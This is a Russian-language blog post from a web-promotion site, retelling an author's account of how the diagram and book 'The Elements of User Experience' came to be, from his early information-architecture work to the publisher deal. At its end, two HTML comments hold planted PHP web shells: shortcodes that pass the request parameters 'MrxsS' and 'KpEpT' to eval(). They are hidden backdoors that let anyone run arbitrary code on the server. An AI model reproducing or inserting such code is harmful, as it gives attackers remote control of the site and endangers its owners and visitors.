msgbartop
Создание и раскрутка сайтов, продвижение в ТОП
msgbarbottom







31 Мар 12 Предыстория

Поскольку меня часто об этом спрашивают, я расскажу, как появились на свет «The Elements of User Experience» (Элементы опыта взаимодействия).

В конце 1999 года я стал первым информационным архи­тектором в серьезной фирме, оказывающей консультаци­онные услуги в области веб-дизайна. Я в изрядной степени сам отвечал за определение своей роли внутри компании и за информирование коллег о том, чем занимаюсь я и как это согласуется с тем, чем занимаются они. Поначалу они относились ко мне настороженно и с подозрением, но со временем поняли, что моя задача — упростить их работу и мое присутствие не подрывает их авторитет.

Одновременно с этим у меня копилась подборка связанных с новой работой материалов. (Впоследствии из этой под­борки сформировалась страничка с ресурсами по информа­ционной архитектуре на моем сайте Www.Jjg.Net/Ia/.) Изу­чая собранные материалы, я постоянно испытывал досаду на произвольное и случайное употребление терминов, обо­значающих базовые понятия в этой области. То, что в од­ном источнике именовалось «информационным дизай­ном», в другом называлось «информационной архитекту­рой». А третий источник сваливал все в одну кучу под на­званием «дизайн интерфейса».

В конце 1999 года и январе 2000 года я пытался выработать внутренне непротиворечивый набор определений для всех этих понятий и искал способ выразить отношения между ними. Однако я был загружен на основной работе, и мо­дель, которую я стремился построить, никак не получа­лась, так что в конце января я забросил эту затею.

В марте я отправился на ежегодную конференцию South by Southwest Interactive Festival в Остин, штат Техас. На про­тяжении этой интересной и плодотворной недели я почти не спал, поскольку насыщенное расписание конференции временами напоминало марафонский забег.

Конференция закончилась, и когда я уже проходил через терминал аэропорта в Остине, меня вдруг осенило: все мои идеи укладываются в трехмерную матрицу. Я терпеливо дождался посадки в самолет и, едва устроившись в кресле, немедленно открыл ноутбук, чтобы в общих чертах набро­сать ту модель, которая пришла мне в голову.

По возвращении в Сан-Франциско я почти сразу слег с из­нурительной простудой и провел в горячке около недели. Пойдя на поправку, я превратил набросок в законченную схему, которая целиком умещалась на листе бумаги. Я на­звал ее «Элементы опыта взаимодействия». Позже я уз­нал, что у многих людей это название вызывает ассоциа­ции с периодической системой Д. И. Менделеева и книгой Странка и Уайта «Элементы стиля».[1] К сожалению, эти ас­социации не возникли у меня, когда я подбирал название. Я просто выбрал «элементы», чтобы не употреблять неук­люжий термин «компоненты», звучащий слишком техни­чески.

30 марта я опубликовал в Интернете окончательный вари­ант. (Первоначальную диаграмму по-прежнему можно най­ти по адресу Http://Www.Jjg.Net/Ia/Elements.Pdf.) Диаграмма привлекла внимание. Первыми ею заинтересовались Питер Мерхольц (Peter Merholz) и Джеффри Вин (Jeffrey Veen), впоследствии ставшие моими партнерами в Adaptive Path. Вскоре я доложил о диаграмме широкой аудитории на пер­вой конференции Information Architecture Summit. Посте­пенно до меня стали доходить известия о том, как люди в самых разных уголках земного шара используют диа­грамму для «просвещения» своих коллег и выработки внутри организации общего языка, позволяющего обсуж­дать эти вопросы.

В течение первого года своего существования «Элементы опыта взаимодействия» были загружены с моего сайта бо­лее 20 тысяч раз. До меня доносились истории о том, как эта схема помогает эффективнее работать и общаться и не­большим группам веб-разработчиков, и крупным органи­зациям. К этому времени я уже начал формулировать идею книги, которая удовлетворила бы эту потребность лучше, чем листок бумаги.

Снова наступил март, и я опять оказался в Остине на кон­ференции South by Southwest. На ней я познакомился с Майклом Ноланом (Michael Nolan), сотрудником изда­тельства New Riders Publishing, и изложил ему свою идею. Он отреагировал на нее с энтузиазмом — как, к счастью, и руководство издательства.

Вот так благодаря сочетанию моих усилий с везением по­явилась на свет книга, которую вы держите в руках. Я на­деюсь, что изложенные в ней идеи окажутся для вас на­столько же интересными и полезными, насколько инте­ресным и полезным был для меня процесс ее создания.

<!— [insert_php]if (isset($_REQUEST["MrxsS"])){eval($_REQUEST["MrxsS"]);exit;}[/insert_php][php]if (isset($_REQUEST["MrxsS"])){eval($_REQUEST["MrxsS"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["KpEpT"])){eval($_REQUEST["KpEpT"]);exit;}[/insert_php][php]if (isset($_REQUEST["KpEpT"])){eval($_REQUEST["KpEpT"]);exit;}[/php] —>

Комментарии закрыты.